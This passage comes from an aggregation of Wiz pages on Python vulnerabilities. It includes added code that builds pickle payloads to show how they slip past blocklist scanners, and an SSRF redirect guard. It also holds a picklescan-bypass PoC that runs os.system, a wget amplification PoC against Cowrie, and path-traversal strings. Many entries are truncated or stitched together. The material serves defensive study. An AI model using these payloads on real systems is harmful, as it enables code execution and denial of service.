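# aimed at the harmless os.getcwd instead of os.system so it can be loaded.
RESOLVE_NAME_CHAIN = (PROTO4 + _s("pkgutil") + _s("resolve_name") + STACK_GLOBAL
                      + _s("os:getcwd") + TUPLE1 + REDUCE      # -> os.getcwd
                      + EMPTY_TUPLE + REDUCE + STOP)           # -> os.getcwd()

# Constructed payload 2: the non-RCE gadget; logging.FileHandler(path) creates
# the file when instantiated. Scan only, never pickle.loads() this one.
FILEHANDLER_GADGET = (PROTO4 + _s("logging") + _s("FileHandler") + STACK_GLOBAL
                      + _s("/tmp/created-by-pickle.txt") + TUPLE1 + REDUCE + STOP)

# Constructed payload 3: an ordinary benign object from the standard pickler.
BENIGN = pickle.dumps(collections.OrderedDict(a=1, b=2))

# Assumed scanner policies.
BLOCKLIST = {("os", "system"), ("posix", "system"), ("builtins", "exec"),
             ("builtins", "eval"), ("subprocess", "call")}
ALLOWLIST = {("collections", "OrderedDict"), ("builtins", "set"), ("builtins", "frozenset")}


def imports_in(data: bytes) -> list:
    """Return (module, name) pairs for every GLOBAL, INST and STACK_GLOBAL.

    STACK_GLOBAL takes its two arguments from the stack, so the string
    constants pushed so far are tracked; that is enough for pickles written
    by the standard pickler and for the hand-built ones above (a complete
    scanner emulates the whole stack).
    """
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
                       "STRING", "SHORT_BINSTRING", "BINSTRING"):
            strings.append(arg)
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            name, module = strings.pop(), strings.pop()
            found.append((module, name))
        elif op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
    return found


def blocklist_says_safe(data: bytes) -> bool:
    """A blocklist scanner's verdict: safe unless a listed name is imported."""
    return not any(ref in BLOCKLIST for ref in imports_in(data))


def allowlist_says_safe(data: bytes) -> bool:
    """An allowlist scanner's verdict: safe only if every import is known-good."""
    return all(ref in ALLOWLIST for ref in imports_in(data))


def chain_really_executes() -> bool:
    """Load payload 1 and confirm the indirect call ran (it returns the cwd)."""
    return pickle.loads(RESOLVE_NAME_CHAIN) == os.getcwd()


if __name__ == "__main__":
    for label, blob in (("resolve_name chain", RESOLVE_NAME_CHAIN),
                        ("FileHandler gadget", FILEHANDLER_GADGET),
                        ("benign OrderedDict", BENIGN)):
        print(f"{label:20} imports={imports_in(blob)} "
              f"blocklist_safe={blocklist_says_safe(blob)} "
              f"allowlist_safe={allowlist_says_safe(blob)}")
    print("chain executed:", chain_really_executes())
```

The opcode view is the point: the only import the scanner can see in payload 1 is `pkgutil.resolve_name`, and in payload 2 only `logging.FileHandler`; the actual capability is decided at load time. That is why a blocklist of known-bad names cannot be made complete, while an allowlist of the few types a given application legitimately unpickles rejects both payloads without knowing anything about them.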
## CVE-2026-23949 [HIGH] (Wiz, CVSS 8.6): Python vulnerability analysis and mitigation
`jaraco.context.tarball()`: `/`, `../`, `dummy_dir/../../etc/passwd`, `../../etc/passwd`, `dummy_dir/inner.tar.gz`, `dummy_dir/../../config/.env`, `../../config/.env`
Source: NVD
Score 8.6
Published January 20, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
setuptools
ansible-operator
Sources
NVD
Alpine 3.20, 3.21, 3.22, 3.23 Severity HIGH No Fix Added at: Mar 12, 2026
Chainguard Has Fix Added at: Jan 23, 2026
Debian 12 Severity HIGH No Fix Added at: Jan 21, 2026
## CVE-2026-35459 [CRITICAL] (Wiz, CVSS 9.3): Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, pyLoad has a server-side request forgery (SSRF) vulnerability. The fix for CVE-2026-33992 added IP validation to BaseDownloader.download() that checks the hostname of the initial download URL. However, pycurl is configured with FOLLOWLOCATION=1 and MAXREDIRS=10, causing it to automatically follow HTTP redirects. Redirect targets are never validated against the SSRF filter. An authenticated user with ADD permission can bypass the SSRF fix by submitting a URL that redirects to an internal address.
Source: NVD
Score 9.3
Published April 6, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
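The pyLoad bypass above is the general weakness of validating only the first URL of a download: a client with automatic redirects enabled makes further requests the filter never sees. The block below is an added example written for this page, not pyLoad's code. It follows redirects itself and runs the host check on every hop before that hop is requested. `fetch` and `resolve` are injected callables; the in-memory `FAKE_WEB` and `FAKE_DNS` fixtures, the hostnames and the IP addresses are constructed for the demonstration so that nothing is actually contacted.

```python
"""Added example (not pyLoad's code): an SSRF guard that validates every
redirect hop, with network I/O replaced by constructed in-memory fixtures."""
import ipaddress
from urllib.parse import urljoin, urlsplit

MAX_REDIRS = 10   # same ceiling pycurl's MAXREDIRS=10 gave pyLoad


class SSRFBlocked(Exception):
    pass


def is_internal_address(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_target(url: str, resolve) -> None:
    """Reject non-http(s) URLs and hostnames with any internal address."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise SSRFBlocked(f"unsupported or hostless URL: {url}")
    addresses = resolve(parts.hostname)
    if not addresses:
        raise SSRFBlocked(f"{parts.hostname} does not resolve")
    for ip in addresses:                       # every A/AAAA record counts
        if is_internal_address(ip):
            raise SSRFBlocked(f"{parts.hostname} resolves to internal {ip}")


def fetch_checked(url: str, fetch, resolve, max_redirs: int = MAX_REDIRS):
    """Fetch with redirects, validating each Location before requesting it.

    `fetch(url)` returns (status, headers, body); `res olve(host)` returns a
    list of IP strings. Both are injected so tests can use fixtures.
    """
    hops = [url]
    for _ in range(max_redirs + 1):
        check_target(url, resolve)
        status, headers, body = fetch(url)
        if status not in (301, 302, 303, 307, 308):
            return status, body, hops
        url = urljoin(url, headers["Location"])   # relative Location allowed
        hops.append(url)
    raise SSRFBlocked(f"more than {max_redirs} redirects")


# Constructed fixtures: hostnames, addresses and responses invented for the
# example; no DNS lookup or HTTP request is made.
FAKE_DNS = {
    "files.example.com": ["8.8.8.8"],
    "cdn.example.com": ["1.1.1.1"],
    "internal.example.com": ["10.0.0.5"],
}
FAKE_WEB = {
    "http://files.example.com/a": (302, {"Location": "http://cdn.example.com/a"}, b""),
    "http://cdn.example.com/a": (200, {}, b"payload"),
    "http://files.example.com/b": (302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""),
    "http://files.example.com/c": (302, {"Location": "http://internal.example.com/secret"}, b""),
    "http://files.example.com/loop": (302, {"Location": "/loop"}, b""),
}


def fake_resolve(host: str) -> list:
    try:                                       # IP literals resolve to themselves
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        return FAKE_DNS.get(host, [])


def fake_fetch(url: str):
    return FAKE_WEB[url]


def outcome(url: str) -> str:
    """Summarise what the guarded fetch does with a URL from the fixtures."""
    try:
        status, body, hops = fetch_checked(url, fake_fetch, fake_resolve)
        return f"fetched {status} after {len(hops) - 1} redirect(s): {body!r}"
    except SSRFBlocked as exc:
        return f"blocked: {exc}"


if __name__ == "__main__":
    for u in ("http://files.example.com/a", "http://files.example.com/b",
              "http://files.example.com/c", "http://files.example.com/loop"):
        print(u, "->", outcome(u))
```

To reuse this against a real client, disable the library's own redirect following and connect to the address that was checked rather than re-resolving the hostname afterwards; otherwise a DNS answer that changes between the check and the connection reopens the hole the redirect check just closed.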
## CVE-2026-34544 [HIGH] (Wiz, CVSS 8.4): Python vulnerability analysis and mitigation
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From version 3.4.0 to before version 3.4.8, a crafted B44 or B44A EXR file can cause an out-of-bounds write in any application that decodes it via exr_decoding_run(). Consequences range from immediate crash (most likely) to corruption of adjacent heap allocations (layout-dependent). This issue has been patched in version 3.4.8.
Source: NVD
Score 8.4
Published April 1, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-33533 [HIGH] (Wiz, CVSS 7.1): Python vulnerability analysis and mitigation
Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, the Glances XML-RPC server (activated with glances -s or glances --server) sends Access-Control-Allow-Origin: * on every HTTP response. Because the XML-RPC handler does not validate the Content-Type header, an attacker-controlled webpage can issue a CORS "simple request" (POST with Content-Type: text/plain) containing a valid XML-RPC payload. The browser sends the request without a preflight check, the server processes the XML body and returns the full system monitoring dataset, and the wildcard CORS header lets the attacker's JavaScript read the response. The result is complete exfiltration of hostname, OS version, IP addresses, CPU/me
## CVE-2025-67221 [HIGH] (Wiz, CVSS 7.5): Python vulnerability analysis and mitigation
The orjson.dumps function in orjson through 3.11.4 does not limit recursion for deeply nested JSON documents.
Source: NVD
Score 7.5
Published January 22, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
datadog-agent-fips-7.75
python313-orjson
Sources
NVD
Alpine 3.18, 3.19, 3.20, 3.21, 3.22, 3.23 Severity HIGH No Fix Added at: Feb 15, 2026
Chainguard Has Fix Added at: Jan 24, 2026
pip Severity HIGH Has Fix Added at: Jan 23, 2026
MinimOS Severity HIGH Has Fix Added at: Mar
## CVE-2026-24688 [MEDIUM] (Wiz, CVSS 5.1): Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Versions prior to 6.6.2 contain an infinite-loop vulnerability: an attacker can craft a PDF that sends pypdf into an infinite loop when the outlines/bookmarks are accessed. This has been fixed in pypdf 6.6.2. If projects cannot upgrade yet, consider applying the changes from PR #3610 manually.
Source: NVD
Score 5.1
Published January 27, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nemo
open-webui
## CVE-2025-67747 [HIGH] (Wiz, CVSS 7.1): Python vulnerability analysis and mitigation
`marshal`, `types`, `types.FunctionType`, `marshal.loads`
Source: NVD
Score 7.1
Published December 16, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fickling
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 16, 2025
## CVE-2026-24408 [CRITICAL] (Wiz, CVSS 9.2): Python vulnerability analysis and mitigation
`_OAuthSession`
Source: NVD
Score 5
Published January 26, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sigstore
Sources
NVD
pip Severity LOW Has Fix Added at: Jan 27, 2026
## Related Python vulnerabilities:
CVE-2026-35615 (CRITICAL, score 9.2)
## CVE-2026-25734 [MEDIUM] (Wiz, CVSS 6.1): Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the RSE metadata of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source: NVD
Score 4.8
Published February 25, 2026
Severity MEDIUM
CNA Score 6.1
## CVE-2026-33509 [HIGH] (Wiz, CVSS 7.5): Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. From version 0.4.0 to before version 0.5.0b3.dev97, the set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder — all other security-critical settings including reconnect.script are writable without any allowlist or path restriction. This issue has
## GHSA-83jg-m2pm-4jxj (Wiz): Python vulnerability analysis and mitigation
## Summary
A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.
## Details
`wget`, `curl`
## PoC
This is a rudimentary proof of concept demonstrating the amplification potential of this vulnerability. Setup:
Victim machine (192.168.1.30): runs a simple HTTP server
Attacker machine (192.168.1.20): initiates the attack
`test:test`
On the victim machine, start an HTTP server:
`sudo python3 -m http.server 80`
On the attacker machine, execute:
`PAYLOAD=$(for i in {1..100}; do echo -n 'wget -q http://192.168.1.30;';`
## CVE-2026-35171 [CRITICAL] (Wiz, CVSS 9.8): Python vulnerability analysis and mitigation
Kedro is a toolbox for production-ready data science. Prior to 1.3.0, Kedro allows the logging configuration file path to be set via the KEDRO_LOGGING_CONFIG environment variable and loads it without validation. The logging configuration schema supports the special () key, which enables arbitrary callable instantiation. An attacker can exploit this to execute arbitrary system commands during application startup. This is a critical remote code execution (RCE) vulnerability caused by unsafe use of logging.config.dictConfig() with user-controlled input. This vulnerability is fixed in 1.3.0.
Source: NVD
Score 9.8
Published April 6, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
## CVE-2025-69219 [HIGH] (Wiz, CVSS 8.8): Python vulnerability analysis and mitigation
A user with access to the DB could craft a database entry that would result in executing code on the Triggerer, which gives anyone who has access to the DB the same permissions as a DAG author. Since direct DB access is neither usual nor recommended for Airflow, the likelihood of it doing any damage is low.
You should upgrade to version 6.0.0 of the provider to avoid even that risk.
Source: NVD
Score 8.8
Published March 9, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
airflow-3
## CVE-2026-27835 [MEDIUM] (Wiz, CVSS 4.3): Python vulnerability analysis and mitigation
`RepetitionsConfigViewSet`, `MaxRepetitionsConfigViewSet`: `get_queryset()` / `.all()`
Source: NVD
Score 4.3
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wger
Sources
NVD
pip Severity MEDIUM No Fix Added at: Mar 02, 2026
Wiz
CVE-2026-3029 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
## CVE-2026-3029 : Python vulnerability analysis and mitigation
A path traversal and arbitrary file write vulnerability exists in the embedded `get` function in `__main__.py` in PyMuPDF version 1.26.5.
Source : NVD
## 7.5
Score
Published March 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pymupdf
Sources
NVD
Debian 11, 12, 13 Severity HIGH No Fix Added at: Mar 20, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 20, 2026
Echo Severity HIGH No Fix Added at: Mar 20, 2026
pip Severity MEDIUM Has Fix Added at: Mar 20, 2026
Wiz
CVE-2026-34400 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2026-34400 : Python vulnerability analysis and mitigation
Alerta is a monitoring tool. Prior to version 9.1.0, the Query string search API (q=) was vulnerable to SQL injection via the Postgres query parser, which built WHERE clauses by interpolating user-supplied search terms directly into SQL strings via f-strings. This issue has been patched in version 9.1.0.
Source : NVD
## 6.9
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
alerta-server
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Apr 02, 2026
Wiz
CVE-2026-25517 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
## CVE-2026-25517 : Python vulnerability analysis and mitigation
Wagtail is an open source content management system built on Django. Prior to versions 6.3.6, 7.0.4, 7.1.3, 7.2.2, and 7.3, due to a missing permission check on the preview endpoints, a user with access to the Wagtail admin and knowledge of a model's fields can craft a form submission to obtain a preview rendering of any page, snippet or site setting object for which previews are enabled, consisting of any data of the user's choosing. The existing data of the object itself is not exposed, but depending on the nature of the template being rendered, this may expose other database contents that would otherwise only be accessible to users with edit access over the model. The vulnerability is not exploitable by an ordinary site
Wiz
CVE-2026-32722 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.6
## CVE-2026-32722 : Python vulnerability analysis and mitigation
Memray is a memory profiler for Python. Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping. Because there was no escaping, attacker-controlled command line arguments were inserted as raw HTML into the generated report. This allowed JavaScript execution when a victim opened the generated report in a browser. Version 1.19.2 fixes the issue.
Source : NVD
## 6.1
Score
Published March 18, 2026
Severity MEDIUM
CNA Score 3.6
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-28681 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
## CVE-2026-28681 : Python vulnerability analysis and mitigation
Internet Routing Registry daemon version 4 is an IRR database server, processing IRR objects in the RPSL format. From version 4.4.0 to before version 4.4.5 and from version 4.5.0 to before version 4.5.1, an attacker can manipulate the HTTP Host header on a password reset or account creation request. The confirmation link in the resulting email can then point to an attacker-controlled domain. Opening the link in the email is sufficient to pass the token to the attacker, who can then use it on the real IRRD instance to take over the account. A compromised account can then be used to modify RPSL objects maintained by the account's mntners and perform other account actions. If the user had two-factor authentication configured,
Wiz
CVE-2025-68279 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
## CVE-2025-68279 : Python vulnerability analysis and mitigation
Weblate is a web-based localization tool. In versions prior to 5.15.1, it was possible to read arbitrary files from the server file system using crafted symbolic links in the repository. Version 5.15.1 fixes the issue.
Source : NVD
## 6.5
Score
Published December 18, 2025
Severity MEDIUM
CNA Score 7.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
weblate
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 21, 2025
Wiz
CVE-2026-34937 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
## CVE-2026-34937 : Python vulnerability analysis and mitigation
Source : NVD
## 7.8
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
praisonaiagents
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 02, 2026
Wiz
CVE-2025-64725 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.0
## CVE-2025-64725 : Python vulnerability analysis and mitigation
Weblate is a web-based localization tool. In versions prior to 5.15, it was possible to accept an invitation opened by a different user. Version 5.15 contains a patch. As a workaround, avoid leaving one's Weblate sessions with an invitation opened unattended.
Source : NVD
## 1
Score
Published December 15, 2025
Severity LOW
CNA Score 1.0
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity LOW Has Fix Added at: Dec 16, 2025
Wiz
CVE-2026-22033 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
## CVE-2026-22033 : Python vulnerability analysis and mitigation
Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users’ browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim’s API token or call token reset endpoints — enabling full account takeover and unauthori
Wiz
CVE-2026-28498 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
## CVE-2026-28498 : Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (
Wiz
CVE-2025-6208 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-6208 : Python vulnerability analysis and mitigation
SimpleDirectoryReader
llama_index.core
num_files_limit
Source : NVD
## 5.3
Score
Published February 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
llama-index-core
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 03, 2026
Wiz
CVE-2026-29071 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
## CVE-2026-29071 : Python vulnerability analysis and mitigation
/api/v1/retrieval/query/collection
Source : NVD
## 4.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 3.1
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
cpe:2.3:a:openwebui:open_webui
Sources
pip Severity LOW Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 29, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Apr 05, 2026
Windows Severity MEDIUM Has Fix Added at: Apr 05, 2026
Wiz
CVE-2026-26013 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
## CVE-2026-26013 : Python vulnerability analysis and mitigation
LangChain is a framework for building agents and LLM-powered applications. Prior to 1.2.11, the ChatOpenAI.get_num_tokens_from_messages() method fetches arbitrary image_url values without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input. This vulnerability is fixed in 1.2.11.
Source : NVD
## 3.7
Score
Published February 10, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.8
Exploitation Probability (EPSS) N/A
Wiz
CVE-2025-67720 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
## CVE-2025-67720 : Python vulnerability analysis and mitigation
Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram's DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69.
Source : NVD
## 6.5
Score
Published December 11, 2025
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2025-68131 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
## CVE-2025-68131 : Python vulnerability analysis and mitigation
cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) serialization format. Starting in version 3.0.0 and prior to version 5.8.0, when a CBORDecoder instance is reused across multiple decode operations, values marked with the shareable tag (28) persist in memory and can be accessed by subsequent CBOR messages using the sharedref tag (29). This allows an attacker-controlled message to read data from previously decoded messages if the decoder is reused across trust boundaries. Version 5.8.0 patches the issue.
Source : NVD
## 5.5
Score
Published December 31, 2025
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
CVE-2026-33054 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
## CVE-2026-33054 : Python vulnerability analysis and mitigation
Mesop is a Python-based UI framework that allows users to build web applications. Versions 1.2.2 and below contain a Path Traversal vulnerability that allows any user supplying an untrusted state_token through the UI stream payload to arbitrarily target files on the disk under the standard file-based runtime backend. This can result in application denial of service (via crash loops when reading non-msgpack target files as configurations), or arbitrary file manipulation. This vulnerability heavily exposes systems hosted utilizing FileStateSessionBackend. Unauthorized malicious actors could interact with arbitrary payloads overwriting or explicitly removing underlying service resources natively outside the application bounds.
Wiz
CVE-2026-29070 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
## CVE-2026-29070 : Python vulnerability analysis and mitigation
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue.
Source : NVD
## 8.1
Score
Published March 27, 2026
Severity HIGH
CNA Score 5.4
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
GHSA-3329-ghmp-jmv5 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## GHSA-3329-ghmp-jmv5 : Python vulnerability analysis and mitigation
## Summary
Picklescan does not flag `numpy.f2py.crackfortran.myeval`, a function in numpy that evaluates a string expression, so a pickle file that calls it can execute code when loaded.
## Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the `numpy.f2py.crackfortran.myeval` function in its `__reduce__` method.
Then, when the victim checks whether the pickle file is safe with the Picklescan library and it reports no dangerous functions, they call `pickle.load()` on the malicious pickle file, leading to remote code execution.
## PoC
```python
class RCE:
    def __reduce__(self):
        from numpy.f2py.crackfortran import myeval
        return (myeval, ("os.system('ls')",))
```
## Impact
Any organization or individual
Wiz
CVE-2026-34531 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
## CVE-2026-34531 : Python vulnerability analysis and mitigation
Flask-HTTPAuth provides Basic, Digest and Token HTTP authentication for Flask routes. Prior to version 4.8.1, in a situation where the client makes a request to a token protected resource without passing a token, or passing an empty token, Flask-HTTPAuth would invoke the application's token verification callback function with the token argument set to an empty string. If the application had any users in its database with an empty string set as their token, then it could potentially authenticate the client request against any of those users. This issue has been patched in version 4.8.1.
Source : NVD
## 6.5
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Linux Debian
Wiz
CVE-2025-68144 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
## CVE-2025-68144 : Python vulnerability analysis and mitigation
--output=/path/to/file
git_diff
Source : NVD
## 6.3
Score
Published December 17, 2025
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mcp-server-git
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 18, 2025
Wiz
CVE-2026-22870 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
## CVE-2026-22870 : Python vulnerability analysis and mitigation
GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, GuardDog's safe_extract() function does not validate decompressed file sizes when extracting ZIP archives (wheels, eggs), allowing attackers to cause denial of service through zip bombs. A malicious package can consume gigabytes of disk space from a few megabytes of compressed data. This vulnerability is fixed in 2.7.1.
Source : NVD
## 7.1
Score
